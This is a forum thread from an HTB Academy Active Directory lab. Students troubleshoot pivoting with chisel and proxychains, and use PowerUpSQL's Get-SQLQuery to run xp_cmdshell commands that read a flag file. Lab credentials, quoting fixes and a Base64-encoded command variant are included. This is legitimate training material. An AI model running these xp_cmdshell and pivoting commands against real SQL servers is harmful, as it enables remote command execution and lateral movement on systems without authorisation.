I was stuck on Q4 for a while and ended up getting the flag through an unintended way. It suggests we use mssqlclient. I’ve tried uploading impacket and installing it but it does not work.

Sup man, did you resolve it? I'm stuck there too.

There’s a hacker box you can connect to at .225 using the regular credentials we used before. I did not know this when I first attacked this section.


Thank you, I forgot that and was wondering how to access it with my VM. I thought about trying port forwarding, but I was sure there should be an easier way.
They should put that info at the bottom with the exercise instead of in the middle of the lesson…

Finally :slight_smile:
→ I transferred mssqlclient.exe to the DAMUNDSEN RDP session and executed the command in PowerShell.
→ After so many hits and tries, this finally worked for me.


Thank you! I was very confused by this section's instructions.

It’s normal that mssqlclient doesn’t succeed, because the SQL server has a different internal IP address that can’t even be pinged from the attacker. I succeeded by pivoting using chisel (this link is so helpful: Pivoting with Chisel | Ap3x Security, releases: Releases · jpillora/chisel · GitHub), then proxychains4 -q mssqlclient… would do the job. Good luck.

That’s a recurrent problem with HTB Academy and their weird questioning and hints etc… Too many vague instructions for labs like this one. Same when you run Get-SQLInstanceDomain: it gave me a host name, not an IP, and in the real world we are going to use the hostname with Get-SQLQuery, when here we use the IP we were given in the question…
And this module is missing too much info; PowerUpSQL is enough for the last question, for example, there is a Get-SQLQuery…

Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt'''


I followed the syntax given in your reply. All I get is the following:

PS C:\tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt'''
VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.
PS C:\tools\PowerUpSQL>

What am I doing wrong??

It is because at the powershell -c you use double quotes when it is 2 single quotes, I think.

Tried again your suggestions:

The entry I made is as follows:
PS C:\tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell' 'powershell -c cat c:\Users\damundsen\Desktop\flag.txt'
VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.

Again I am confused. Any help?

How do you transfer to the DAMUNDSEN RDP session, as when you connect to the DAMUNDSEN RDP session it does not have any PowerShell or CMD instances?

Come on, look at the end of your query: there is only one quote when you need 3…

Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt'''

The above is what I ran again. Still the same error.

VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.

I am doing something wrong. I am unable to point where this mistake is taking place. I am running Remmina with htb-student/and the corresponding password given

Your problem is still the quotes… You put double quotes before powershell when I told you it is 2 single quotes (one to escape the other…). And at the end it is 3 single quotes, to close the 2 double quotes before powershell and the quote before EXEC at the beginning… Learn how to escape quotes in PowerShell and apply it. A lot of people have problems with this, so maybe try with a base64 PowerShell command.

For Question #4 there is a Linux attack box that you can SSH into (like the previous module) once you’ve RDP’d into the host.

Open a PowerShell console on MS01 and SSH to with the credentials htb-student:HTB_@cademy_stdnt!

This machine has on it and can interact with INLANEFREIGHT/DAMUNDSEN@

You can then run the commands in the module to get the flag.

Hey buddy, I replicated your Get-SQLQuery example with several permutations without success. I also tried the PS Base64 encoding. This is what I did, sharing a bit of context:

This is your command suggestion: Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt'''

And this is the output :
VERBOSE:,1433 : Connection Success.
VERBOSE:,1433 : Connection Failed.

PS Base64 Encoding : Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query JwBFAFgARQBDACAAeABwAF8AYwBtAGQAcwBoAGUAbABsACAAJwAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGMAIABjAGEAdAAgAGMAOgBcAFUAcwBlAHIAcwBcAGQAYQBtAHUAbgBkAHMAZQBuAFwARABlAHMAawB0AG8AcABcAGYAbABhAGcALgB0AHgAdAAnACcAJwA=

Same output. I really would like to grab the flag with this method; I read through several docs with no success either.
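
The quoting layers discussed in the posts above, as an added example that is not part of any post in this thread: it only builds and inspects strings and never connects to a SQL Server. `Test-TsqlQuoteBalance` is a hypothetical helper written for this illustration, and `Get-Content` stands in for the `cat` alias used in the thread.

```powershell
# Added example: string handling only, no connection is made.

function Test-TsqlQuoteBalance {
    # Hypothetical helper: a T-SQL statement must contain an even number of
    # straight single quotes (open/close pairs, plus '' escapes).
    param([string]$Sql)
    $count = ($Sql.ToCharArray() | Where-Object { $_ -eq "'" }).Count
    return ($count % 2) -eq 0
}

# 1) Two layers of single-quote escaping.
#    PowerShell layer: inside '...' a doubled '' becomes one literal '.
#    So '' before powershell opens the T-SQL string, and the final '''
#    is '' (closes the T-SQL string) + ' (closes the PowerShell string).
$query = 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt'''
$query                          # text that would be sent as T-SQL
Test-TsqlQuoteBalance $query    # True

# 2) With a space between the quotes, PowerShell sees two separate strings.
#    -query would bind only the first; the second becomes a stray argument.
$parts = @('EXEC xp_cmdshell', 'powershell -c cat c:\Users\damundsen\Desktop\flag.txt')
$parts.Count                    # 2
$parts[0]                       # EXEC xp_cmdshell   (no command attached)

# 3) Base64 removes the inner quoting problem only when it wraps the inner
#    PowerShell command. powershell.exe -EncodedCommand expects Base64 of
#    the UTF-16LE bytes of the command.
$inner   = 'Get-Content c:\Users\damundsen\Desktop\flag.txt'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($inner))
$query2  = "EXEC xp_cmdshell 'powershell -EncodedCommand $encoded'"
Test-TsqlQuoteBalance $query2   # True

# Round trip: confirm what powershell.exe would decode and run.
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))

# 4) Encoding the whole -query value does not help: the -query text is sent
#    to the server as T-SQL, and a Base64 blob is not a T-SQL statement.
$wholeQueryEncoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($query))
$wholeQueryEncoded -match '^EXEC'   # False
```

Printing the query string before passing it to `-query` shows exactly what the server would receive, which separates a quoting mistake from a connection or permission problem.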

Hey @r3l1k, did you get the flag with this command :
Get-SQLQuery -Verbose -Instance ",1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query 'EXEC xp_cmdshell ''powershell -c cat c:\Users\damundsen\Desktop\flag.txt''

What host can this user access via WinRM? (just the computer name)

How to find the host?

If someone needs help with the last question, just RDP as the damundsen user and put the Get-SQLQuery command in PowerShell. The command doesn’t work in the htb-student RDP session.